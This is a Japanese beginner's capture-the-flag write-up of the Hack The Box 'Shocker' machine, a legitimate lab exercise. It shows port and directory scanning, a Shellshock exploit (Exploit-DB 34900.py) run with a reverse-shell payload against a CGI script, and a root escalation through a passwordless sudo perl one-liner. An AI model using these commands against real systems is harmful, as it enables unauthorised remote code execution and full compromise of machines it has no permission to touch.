Hack The Box Writeup Shocker
■準備
Hack The Boxのサイトにログイン
ovpnファイルをHack The Boxのサイトからダウンロードしておく
VPNで接続
$ sudo openvpn lab_xxxxx.ovpn
(略)
2021-07-16 22:01:20 Preserving previous TUN/TAP instance: tun0
2021-07-16 22:01:20 Initialization Sequence Completed
「Initialization Sequence Completed」で止まったらOK
VPNが切断され、接続リトライを繰り返すなど、
安定しない場合は別の国のサーバを選択したほうがよい
(ブラウザ側にてコンフィグをダウンロードする前に選択可能)
別のターミナルを開いてコマンドを実行していく
■問題
Shocker
https://app.hackthebox.eu/machines/Shocker
参考
https://qiita.com/yukitsukai47/items/37de18a81b138d93373a
(初心者なのでほぼそのまま真似しています)
■調査
$ nmap -sV -sT -sC 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 08:18 EDT
Nmap scan report for 10.10.10.56
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 *1
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.91 seconds
ブラウザでアクセスしてみる
特にヒントはない。
■ディレクトリスキャナーで使うファイルを準備
$ locate directory-list-2.3-medium.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
中身はこんな感じ
$ tail -n 10 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
t15499
t15498
t15507
nt4lgscr
t15511
ntsrvtls
t15510
ntservpk
t1551
nt4stopc
■ディレクトリスキャナーでスキャン
(-t 25はスキャンに使用するスレッド数)
$ gobuster dir -t 25 -u http://10.10.10.56 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuser_output.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/17 08:22:05 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 299]
特になさそう(中断)
■別のスキャナを使ってみる
$ dirb http://10.10.10.56
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jul 17 08:30:59 2021
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)
■上記で見つかったcgi-binの下をスキャン(sh,cgi,pl)
$ gobuster dir -t 25 -u http://10.10.10.56/cgi-bin/ -x sh,cgi,pl -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuser_output.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: pl,sh,cgi
[+] Timeout: 10s
===============================================================
2021/07/17 08:36:13 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 118]
■user.shをみてみる
$ curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
08:36:58 up 7:42, 0 users, load average: 0.00, 0.02, 0.00
問題タイトルから、shell shockの脆弱性があるのではと考える
脆弱性を検索
$ searchsploit shell shock
------------------------------------------------------------------------------------ -------------------
Exploit Title | Path
------------------------------------------------------------------------------------ -------------------
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasp | cgi/remote/38849.rb
Apache mod_cgi - 'Shellshock' Remote Command Injection | linux/remote/34900.py
Bash - 'Shellshock' Environment Variables Command Injection | linux/remote/34766.php
$ locate 34900.py
/usr/share/exploitdb/exploits/linux/remote/34900.py
$ cp -p /usr/share/exploitdb/exploits/linux/remote/34900.py .
PoCを実行してみる
$ python ./34900.py payload=bind rhost=10.10.10.56 rport=80
[-] Trying exploit on : /cgi-sys/entropysearch.cgi
[*] 404 on : /cgi-sys/entropysearch.cgi
[!] Successfully exploited
[!] Connected to 10.10.10.56
なんか動きがおかしい(RCEされず)
引数を変えてみる
$ python ./34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.16.9 lport=1234
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-sys/entropysearch.cgi
[*] 404 on : /cgi-sys/entropysearch.cgi
[-] Trying exploit on : /cgi-sys/defaultwebpage.cgi
[*] 404 on : /cgi-sys/defaultwebpage.cgi
[-] Trying exploit on : /cgi-mod/index.cgi
[*] 404 on : /cgi-mod/index.cgi
[-] Trying exploit on : /cgi-bin/test.cgi
[*] 404 on : /cgi-bin/test.cgi
[-] Trying exploit on : /cgi-bin-sdb/printenv
[*] 404 on : /cgi-bin-sdb/printenv
途中で止まる
pagesを指定するらしい
$ python ./34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.16.9 lport=1234 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
10.10.10.56> ls
user.sh
10.10.10.56>cat /home/shelly/user.txt
→なぜか、結果として出てきたFlagを投稿しても、incorrect flagでOKにならない。
点数はつかないし、仕方ないか・・・。
sudoコマンドを使えるか確認
10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Perlはパスワードなしでsudoできるので、Perlからシェルを起動する
10.10.10.56> sudo perl -e 'exec("/bin/bash")'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)
ルート権限でコマンド実行可能となった
以下サイトに、コマンドごとにrootを取るのに役立つ方法がまとめられている
https://gtfobins.github.io/
10.10.10.56> cat /root/root.txt
incorrect flagでOKにならなかったが完了
